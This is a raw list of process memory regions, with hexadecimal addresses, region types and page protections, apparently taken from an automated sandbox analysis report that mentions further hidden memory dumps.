trusted library allocation
page read and write
5C24000
heap
page read and write
91D000
heap
page read and write
470E000
stack
page read and write
7370000
trusted library allocation
page read and write
7F0E0000
trusted library allocation
page execute and read and write
5061000
trusted library allocation
page read and write
4950000
heap
page read and write
669F000
stack
page read and write
2D39000
heap
page read and write
6113000
heap
page read and write
8B0000
heap
page read and write
6183000
heap
page read and write
923000
heap
page read and write
6117000
heap
page read and write
78FD000
stack
page read and write
921000
heap
page read and write
832000
heap
page read and write
4858000
trusted library allocation
page read and write
5630000
heap
page read and write
75F0000
trusted library allocation
page read and write
84E000
heap
page read and write
76DF000
stack
page read and write
6195000
heap
page read and write
30F0000
heap
page read and write
2AA9000
heap
page read and write
3178000
heap
page read and write
719D000
stack
page read and write
709F000
stack
page read and write
4DBC000
heap
page read and write
4B3F000
stack
page read and write
75C0000
trusted library allocation
page read and write
4730000
trusted library allocation
page read and write
587A000
trusted library allocation
page read and write
519E000
stack
page read and write
8320000
trusted library allocation
page read and write
29E1000
heap
page read and write
586E000
heap
page read and write
2A35000
heap
page read and write
8E7000
heap
page read and write
30DE000
stack
page read and write
278C000
stack
page read and write
2D3C000
heap
page read and write
55DB000
stack
page read and write
4DBC000
heap
page read and write
57A1000
trusted library allocation
page read and write
618B000
heap
page read and write
616B000
heap
page read and write
71FE000
stack
page read and write
5785000
heap
page read and write
7058000
heap
page read and write
2B49000
heap
page read and write
739F000
stack
page read and write
8652000
heap
page read and write
88E000
heap
page read and write
5841000
heap
page read and write
7760000
trusted library allocation
page read and write
25F6000
stack
page read and write
2A82000
heap
page read and write
4A80000
trusted library allocation
page execute and read and write
2C39000
heap
page read and write
4262000
trusted library allocation
page read and write
77EA000
trusted library allocation
page read and write
4F3E000
stack
page read and write
2AAB000
heap
page read and write
835000
heap
page read and write
884C000
stack
page read and write
7900000
trusted library allocation
page read and write
90A000
heap
page read and write
7EC000
heap
page read and write
47AE000
stack
page read and write
7746000
heap
page read and write
2BAE000
stack
page read and write
303E000
stack
page read and write
6174000
heap
page read and write
73B0000
heap
page execute and read and write
701F000
heap
page read and write
5671000
heap
page read and write
2A82000
heap
page read and write
6108000
heap
page read and write
76DB000
heap
page read and write
4DE8000
heap
page read and write
4FC0000
trusted library allocation
page read and write
4B40000
heap
page read and write
595D000
heap
page read and write
6DED000
stack
page read and write
836000
heap
page read and write
56C4000
heap
page read and write
616B000
heap
page read and write
4710000
trusted library allocation
page execute and read and write
8ED000
heap
page read and write
28D0000
heap
page read and write
7304000
trusted library allocation
page read and write
8643000
heap
page read and write
29F1000
heap
page read and write
6171000
heap
page read and write
74DE000
stack
page read and write
6195000
heap
page read and write
7640000
trusted library allocation
page read and write
2A40000
heap
page read and write
46CC000
stack
page read and write
7A0000
direct allocation
page read and write
83D0000
trusted library allocation
page execute and read and write
5C41000
heap
page read and write
61CB000
heap
page read and write
73A0000
heap
page read and write
7289000
heap
page read and write
5887000
trusted library allocation
page read and write
60A8000
heap
page read and write
72CE000
stack
page read and write
29F3000
heap
page read and write
29B0000
heap
page read and write
55BD000
heap
page read and write
5861000
trusted library allocation
page read and write
730E000
stack
page read and write
5FA000
stack
page read and write
618B000
heap
page read and write
2A02000
heap
page read and write
ACE000
stack
page read and write
4CBC000
trusted library allocation
page read and write
574B000
heap
page read and write
5C25000
heap
page read and write
2AAA000
heap
page read and write
2A28000
heap
page read and write
74BA000
heap
page read and write
4DC9000
heap
page read and write
7359000
heap
page read and write
6113000
heap
page read and write
4D94000
heap
page read and write
4573000
trusted library allocation
page execute and read and write
701B000
stack
page read and write
2A32000
heap
page read and write
4574000
trusted library allocation
page read and write
2A50000
heap
page read and write
77E7000
trusted library allocation
page read and write
5785000
heap
page read and write
5663000
heap
page read and write
4ADC000
trusted library allocation
page read and write
5C38000
heap
page read and write
5785000
heap
page read and write
D60000
direct allocation
page read and write
2A3A000
heap
page read and write
52F0000
heap
page read and write
7F0000
heap
page read and write
6D2B000
stack
page read and write
4DE8000
heap
page read and write
77C0000
trusted library allocation
page read and write
591B000
heap
page read and write
7940000
trusted library allocation
page read and write
901000
heap
page read and write
7830000
trusted library allocation
page read and write
4DE2000
heap
page read and write
5785000
heap
page read and write
559F000
stack
page read and write
4820000
heap
page read and write
56DC000
stack
page read and write
51EE000
stack
page read and write
55B3000
heap
page read and write
12FD000
stack
page read and write
2A82000
heap
page read and write
51D7000
trusted library allocation
page read and write
70DE000
stack
page read and write
804000
heap
page read and write
76D3000
heap
page read and write
83EE000
stack
page read and write
2900000
trusted library allocation
page read and write
618B000
heap
page read and write
6021000
heap
page read and write
5C66000
heap
page read and write
4827000
trusted library allocation
page read and write
746E000
stack
page read and write
8FD000
heap
page read and write
533E000
stack
page read and write
637000
stack
page read and write
48AC000
stack
page read and write
160000
heap
page read and write
5C3C000
heap
page read and write
589C000
heap
page read and write
3030000
trusted library allocation
page read and write
6195000
heap
page read and write
7591000
heap
page read and write
735E000
stack
page read and write
7610000
trusted library allocation
page read and write
4A70000
heap
page read and write
5A3B000
trusted library allocation
page read and write
5935000
heap
page read and write
6118000
heap
page read and write
800000
heap
page read and write
3050000
trusted library allocation
page read and write
29E1000
heap
page read and write
3060000
heap
page read and write
6A1D000
stack
page read and write
847000
heap
page read and write
29BD000
stack
page read and write
D6E000
direct allocation
page read and write
595D000
heap
page read and write
4A7E000
trusted library allocation
page read and write
6177000
heap
page read and write
4DE8000
heap
page read and write
593C000
heap
page read and write
77B0000
trusted library allocation
page read and write
6187000
heap
page read and write
41EE000
stack
page read and write
5C66000
heap
page read and write
923000
heap
page read and write
8230000
trusted library allocation
page execute and read and write
5C66000
heap
page read and write
48CC000
trusted library allocation
page read and write
5789000
heap
page read and write
59B000
stack
page read and write
703F000
heap
page read and write
85A0000
trusted library allocation
page read and write
29D9000
heap
page read and write
72F0000
trusted library allocation
page read and write
800000
heap
page read and write
611A000
heap
page read and write
593B000
heap
page read and write
589D000
heap
page read and write
616B000
heap
page read and write
945000
heap
page read and write
75D0000
trusted library allocation
page read and write
90A000
heap
page read and write
860000
heap
page read and write
595F000
heap
page read and write
865D000
heap
page read and write
721D000
stack
page read and write
90D000
heap
page read and write
4DC1000
heap
page read and write
CF0000
direct allocation
page read and write
4265000
trusted library allocation
page execute and read and write
48BE000
trusted library allocation
page read and write
6179000
heap
page read and write
85D0000
heap
page read and write
8E7000
heap
page read and write
49E8000
trusted library allocation
page read and write
594A000
heap
page read and write
7560000
heap
page execute and read and write
8590000
trusted library allocation
page execute and read and write
60C8000
trusted library allocation
page read and write
620C000
trusted library allocation
page read and write
76A3000
heap
page read and write
6173000
heap
page read and write
2FAD000
trusted library allocation
page execute and read and write
4861000
trusted library allocation
page read and write
5C3B000
heap
page read and write
4DDD000
heap
page read and write
297E000
stack
page read and write
7770000
trusted library allocation
page execute and read and write
72FF000
heap
page read and write
901000
heap
page read and write
77E0000
trusted library allocation
page read and write
154E000
stack
page read and write
5787000
heap
page read and write
7780000
trusted library allocation
page read and write
2B5D000
stack
page read and write
7650000
heap
page read and write
6166000
heap
page read and write
4DE8000
heap
page read and write
4C8E000
stack
page read and write
5889000
trusted library allocation
page read and write
311E000
heap
page read and write
51B7000
trusted library allocation
page read and write
275E000
stack
page read and write
73E0000
heap
page read and write
90F000
heap
page read and write
83E0000
trusted library allocation
page read and write
6183000
heap
page read and write
51C8000
trusted library allocation
page read and write
5C5B000
heap
page read and write
6214000
trusted library allocation
page read and write
6D90000
heap
page read and write
4850000
trusted library allocation
page read and write
45A0000
trusted library allocation
page read and write
7FD000
heap
page read and write
591B000
heap
page read and write
4660000
heap
page readonly
72A0000
trusted library allocation
page read and write
29B8000
heap
page read and write
853E000
stack
page read and write
6183000
heap
page read and write
6E7E000
stack
page read and write
7820000
trusted library allocation
page read and write
68EE000
stack
page read and write
2A03000
heap
page read and write
45C0000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
594D000
heap
page read and write
5C2B000
heap
page read and write
6143000
heap
page read and write
6166000
heap
page read and write
6A7D000
stack
page read and write
6111000
heap
page read and write
2A93000
heap
page read and write
1960000
heap
page read and write
740000
direct allocation
page read and write
591C000
heap
page read and write
49F0000
heap
page read and write
61A1000
heap
page read and write
594D000
heap
page read and write
5935000
heap
page read and write
7270000
heap
page read and write
5900000
heap
page read and write
5D41000
trusted library allocation
page read and write
6B9D000
stack
page read and write
29F7000
heap
page read and write
6530000
trusted library allocation
page read and write
49B000
stack
page read and write
2A3A000
heap
page read and write
591C000
heap
page read and write
591C000
heap
page read and write
686E000
stack
page read and write
4670000
trusted library allocation
page read and write
595E000
heap
page read and write
810000
heap
page read and write
6108000
heap
page read and write
6166000
heap
page read and write
2BD0000
heap
page read and write
4AF4000
heap
page read and write
8220000
heap
page read and write
1AE000
stack
page read and write
715D000
stack
page read and write
4824000
heap
page read and write
8EB000
heap
page read and write
6E1E000
stack
page read and write
2CF3000
heap
page read and write
709B000
stack
page read and write
5ED0000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
5D49000
trusted library allocation
page read and write
74C0000
trusted library allocation
page execute and read and write
617E000
heap
page read and write
6195000
heap
page read and write
7D30000
trusted library allocation
page read and write
711A000
stack
page read and write
549E000
stack
page read and write
61A0000
heap
page read and write
562F000
heap
page read and write
29B8000
stack
page read and write
2A90000
heap
page read and write
595D000
heap
page read and write
776B000
heap
page read and write
4A3C000
stack
page read and write
47CF000
stack
page read and write
6111000
heap
page read and write
578D000
heap
page read and write
2EE0000
heap
page read and write
6D40000
heap
page read and write
6162000
heap
page read and write
297C000
stack
page read and write
70FE000
stack
page read and write
4A7D000
stack
page read and write
5C3B000
heap
page read and write
6FDD000
stack
page read and write
2F2F000
stack
page read and write
6195000
heap
page read and write
78BE000
stack
page read and write
6E92000
heap
page read and write
7D20000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
4943000
heap
page read and write
838F000
stack
page read and write
48B6000
trusted library allocation
page read and write
76E2000
heap
page read and write
8FD000
heap
page read and write
618F000
heap
page read and write
809000
heap
page read and write
2BE0000
heap
page read and write
4795000
heap
page execute and read and write
744F000
heap
page read and write
52EE000
stack
page read and write
306A000
trusted library allocation
page execute and read and write
294C000
heap
page read and write
45A5000
trusted library allocation
page execute and read and write
4FA9000
trusted library allocation
page read and write
5885000
trusted library allocation
page read and write
809000
heap
page read and write
4720000
trusted library allocation
page read and write
3050000
trusted library allocation
page execute and read and write
5FA0000
trusted library allocation
page read and write
5C66000
heap
page read and write
755E000
stack
page read and write
856000
heap
page read and write
2D0E000
heap
page read and write
713E000
stack
page read and write
2CFE000
stack
page read and write
4DA3000
trusted library allocation
page read and write
6172000
heap
page read and write
2FD2000
trusted library allocation
page read and write
6BF0000
heap
page read and write
4560000
trusted library allocation
page read and write
6CED000
stack
page read and write
50F4000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
2A38000
heap
page read and write
70DD000
stack
page read and write
76D8000
heap
page read and write
484E000
stack
page read and write
2A01000
heap
page read and write
6D8E000
stack
page read and write
4230000
trusted library allocation
page read and write
51CE000
stack
page read and write
2DBE000
stack
page read and write
591B000
heap
page read and write
1418000
heap
page read and write
8240000
trusted library allocation
page read and write
922000
heap
page read and write
7E90000
heap
page read and write
2B7B000
heap
page read and write
5875000
trusted library allocation
page read and write
6089000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
3044000
trusted library allocation
page read and write
543F000
stack
page read and write
4DD8000
heap
page read and write
742E000
stack
page read and write
4920000
heap
page read and write
B5E000
stack
page read and write
2D10000
trusted library allocation
page read and write
4E98000
trusted library allocation
page read and write
709E000
stack
page read and write
6179000
heap
page read and write
46DC000
stack
page read and write
730A000
heap
page read and write
2B40000
heap
page read and write
4D41000
trusted library allocation
page read and write
5356000
trusted library allocation
page read and write
6162000
heap
page read and write
5E50000
trusted library allocation
page read and write
CD0000
heap
page read and write
2F0E000
unkown
page read and write
594A000
heap
page read and write
735000
heap
page read and write
6D9E000
stack
page read and write
2910000
heap
page read and write
77F0000
trusted library allocation
page read and write
2D36000
heap
page read and write
2C5D000
heap
page read and write
4570000
trusted library allocation
page read and write
7F2000
heap
page read and write
4D95000
heap
page read and write
477E000
stack
page read and write
907000
heap
page read and write
73B3000
heap
page read and write
8050000
trusted library allocation
page read and write
B9D000
stack
page read and write
7630000
trusted library allocation
page read and write
2FCE000
stack
page read and write
4D90000
heap
page read and write
2FC0000
trusted library allocation
page read and write
4DD0000
heap
page read and write
6162000
heap
page read and write
80CE000
stack
page read and write
7050000
heap
page read and write
6108000
heap
page read and write
6162000
heap
page read and write
2C30000
heap
page read and write
817B000
heap
page read and write
492E000
stack
page read and write
2A0D000
heap
page read and write
4DB9000
heap
page read and write
715E000
stack
page read and write
747B000
heap
page read and write
82C0000
heap
page read and write
6020000
heap
page read and write
D30000
heap
page read and write
814E000
stack
page read and write
7D8000
heap
page read and write
29F7000
heap
page read and write
5570000
heap
page read and write
7950000
trusted library allocation
page read and write
5A27000
trusted library allocation
page read and write
90A000
heap
page read and write
2EE8000
heap
page read and write
29E6000
heap
page read and write
2FD5000
trusted library allocation
page execute and read and write
6177000
heap
page read and write
4E29000
heap
page read and write
7301000
heap
page read and write
2D30000
heap
page read and write
4DE8000
heap
page read and write
27D7000
heap
page read and write
83C0000
heap
page read and write
589A000
heap
page read and write
6A9D000
stack
page read and write
4EB5000
heap
page read and write
51C0000
trusted library allocation
page read and write
30F8000
heap
page read and write
763D000
stack
page read and write
7D10000
trusted library allocation
page execute and read and write
6ADA000
stack
page read and write
4C4F000
stack
page read and write
8ED000
heap
page read and write
5C41000
heap
page read and write
4233000
trusted library allocation
page execute and read and write
2B57000
stack
page read and write
618B000
heap
page read and write
2A35000
heap
page read and write
8070000
trusted library allocation
page read and write
5663000
heap
page read and write
2DC0000
heap
page read and write
84A0000
trusted library allocation
page read and write
743E000
heap
page read and write
6111000
heap
page read and write
6137000
heap
page read and write
589C000
heap
page read and write
60A6000
heap
page read and write
589C000
heap
page read and write
585E000
heap
page read and write
775D000
stack
page read and write
29F0000
heap
page read and write
4FD8000
trusted library allocation
page read and write
4DC4000
heap
page read and write
6192000
heap
page read and write
617C000
heap
page read and write
909000
heap
page read and write
856000
heap
page read and write
6FA0000
trusted library allocation
page read and write
6195000
heap
page read and write
4B19000
trusted library allocation
page read and write
856000
heap
page read and write
813000
heap
page read and write
FC000
stack
page read and write
5C5B000
heap
page read and write
2A01000
heap
page read and write
719A000
stack
page read and write
618B000
heap
page read and write
810D000
stack
page read and write
4DD5000
heap
page read and write
75E0000
trusted library allocation
page read and write
2A40000
heap
page read and write
3043000
trusted library allocation
page execute and read and write
725D000
stack
page read and write
74D0000
trusted library allocation
page read and write
595D000
heap
page read and write
7491000
heap
page read and write
6143000
heap
page read and write
2A38000
heap
page read and write
4AF0000
heap
page read and write
2A03000
heap
page read and write
60AA000
heap
page read and write
D10000
direct allocation
page read and write
565C000
heap
page read and write
5A24000
trusted library allocation
page read and write
3090000
trusted library allocation
page read and write
33BE000
stack
page read and write
848E000
stack
page read and write
5F20000
trusted library allocation
page read and write
617E000
heap
page read and write
8080000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
6177000
heap
page read and write
5663000
heap
page read and write
5819000
trusted library allocation
page read and write
422F000
stack
page read and write
2D3C000
heap
page read and write
5BD1000
heap
page read and write
5C5B000
heap
page read and write
7FB48000
trusted library allocation
page execute and read and write
73EE000
stack
page read and write
6E6D000
stack
page read and write
6105000
heap
page read and write
47DE000
stack
page read and write
28B0000
heap
page read and write
6F90000
heap
page execute and read and write
1410000
heap
page read and write
2FF0000
trusted library allocation
page read and write
2AA8000
heap
page read and write
699D000
stack
page read and write
5C38000
heap
page read and write
91A000
heap
page read and write
6F0D000
stack
page read and write
2EEE000
stack
page read and write
7790000
trusted library allocation
page execute and read and write
2A3F000
heap
page read and write
6117000
heap
page read and write
7280000
trusted library allocation
page read and write
FBD000
stack
page read and write
29B8000
heap
page read and write
3EC000
stack
page read and write
4678000
trusted library allocation
page read and write
587C000
trusted library allocation
page read and write
6162000
heap
page read and write
905000
heap
page read and write
4940000
heap
page read and write
5890000
heap
page read and write
2CEE000
stack
page read and write
57CE000
heap
page read and write
4BB7000
heap
page read and write
1EE000
stack
page read and write
617C000
heap
page read and write
5C2B000
heap
page read and write
829000
heap
page read and write
4A68000
trusted library allocation
page read and write
4234000
trusted library allocation
page read and write
4FC4000
trusted library allocation
page read and write
585E000
heap
page read and write
29D7000
heap
page read and write
5812000
heap
page read and write
2D30000
heap
page read and write
8500000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
48E0000
heap
page execute and read and write
792000
direct allocation
page read and write
2A30000
heap
page read and write
2A90000
heap
page read and write
478E000
stack
page read and write
2A30000
heap
page read and write
312C000
heap
page read and write
481E000
stack
page read and write
2F4F000
unkown
page read and write
C9E000
stack
page read and write
842F000
stack
page read and write
83F000
heap
page read and write
5C3B000
heap
page read and write
2F8E000
stack
page read and write
7840000
trusted library allocation
page read and write
7680000
heap
page read and write
6440000
trusted library allocation
page read and write
594D000
heap
page read and write
60A0000
heap
page read and write
7403000
heap
page read and write
2BFA000
heap
page read and write
3060000
trusted library allocation
page read and write
868000
heap
page read and write
2919000
heap
page read and write
6F4F000
stack
page read and write
530F000
stack
page read and write
5BA0000
trusted library allocation
page read and write
577D000
heap
page read and write
730000
heap
page read and write
4690000
heap
page execute and read and write
6177000
heap
page read and write
6166000
heap
page read and write
2B1C000
stack
page read and write
2710000
heap
page read and write
60FF000
heap
page read and write
D80000
heap
page read and write
6470000
trusted library allocation
page read and write
7390000
trusted library section
page read and write
2F90000
trusted library allocation
page read and write
702F000
heap
page read and write
880B000
stack
page read and write
6955000
heap
page execute and read and write
2FA4000
trusted library allocation
page read and write
4580000
trusted library allocation
page read and write
4856000
trusted library allocation
page read and write
717E000
stack
page read and write
541D000
trusted library allocation
page read and write
482A000
trusted library allocation
page read and write
6113000
heap
page read and write
618B000
heap
page read and write
4ED5000
heap
page read and write
883000
heap
page read and write
844E000
stack
page read and write
5C41000
heap
page read and write
6179000
heap
page read and write
2DD0000
heap
page read and write
850000
heap
page read and write
5869000
trusted library allocation
page read and write
24FA000
stack
page read and write
577B000
heap
page read and write
786000
direct allocation
page read and write
60A9000
heap
page read and write
29F7000
heap
page read and write
4267000
trusted library allocation
page execute and read and write
D30000
heap
page read and write
5C41000
heap
page read and write
617C000
heap
page read and write
6950000
heap
page execute and read and write
2987000
heap
page read and write
7600000
trusted library allocation
page read and write
4540000
heap
page read and write
831E000
stack
page read and write
4FB4000
trusted library allocation
page read and write
91D000
heap
page read and write
77E0000
trusted library allocation
page read and write
27C9000
stack
page read and write
304D000
trusted library allocation
page execute and read and write
5C24000
heap
page read and write
940000
heap
page read and write
7550000
trusted library allocation
page read and write
6E5F000
stack
page read and write
574B000
heap
page read and write
594D000
heap
page read and write
6113000
heap
page read and write
617E000
heap
page read and write
4800000
heap
page read and write
868000
heap
page read and write
732F000
heap
page read and write
2980000
heap
page read and write
866E000
heap
page read and write
457D000
trusted library allocation
page execute and read and write
6179000
heap
page read and write
922000
heap
page read and write
4B21000
trusted library allocation
page read and write
74AE000
stack
page read and write
4D98000
heap
page read and write
8FD000
heap
page read and write
7FE000
heap
page read and write
2B6E000
heap
page read and write
5C52000
heap
page read and write
49DE000
stack
page read and write
8A10000
trusted library allocation
page read and write
8572000
trusted library allocation
page read and write
7D40000
heap
page read and write
61A7000
heap
page read and write
7412000
heap
page read and write
4E2C000
heap
page read and write
697B000
stack
page read and write
33C0000
heap
page read and write
595D000
heap
page read and write
4DE8000
heap
page read and write
7D0000
heap
page read and write
73C0000
heap
page read and write
48BB000
trusted library allocation
page read and write
4AF0000
heap
page read and write
76C9000
heap
page read and write
75A0000
trusted library allocation
page read and write
74AE000
heap
page read and write
77A0000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
50BF000
trusted library allocation
page read and write
29F0000
heap
page read and write
7ED000
heap
page read and write
460E000
stack
page read and write
4839000
trusted library allocation
page read and write
2AA8000
heap
page read and write
8F4000
heap
page read and write
2A35000
heap
page read and write
6177000
heap
page read and write
884000
heap
page read and write
4ED1000
heap
page read and write
4EA4000
heap
page read and write
6438000
trusted library allocation
page read and write
2D7E000
stack
page read and write
1790000
heap
page read and write
75F0000
trusted library allocation
page read and write
4E2C000
heap
page read and write
60AC000
heap
page read and write
6171000
heap
page read and write
585E000
heap
page read and write
5658000
heap
page read and write
79E0000
trusted library allocation
page read and write
279E000
stack
page read and write
591B000
heap
page read and write
6171000
heap
page read and write
520E000
stack
page read and write
6DDF000
stack
page read and write
5140000
heap
page read and write
There are 1195 hidden memdumps, click here to show them.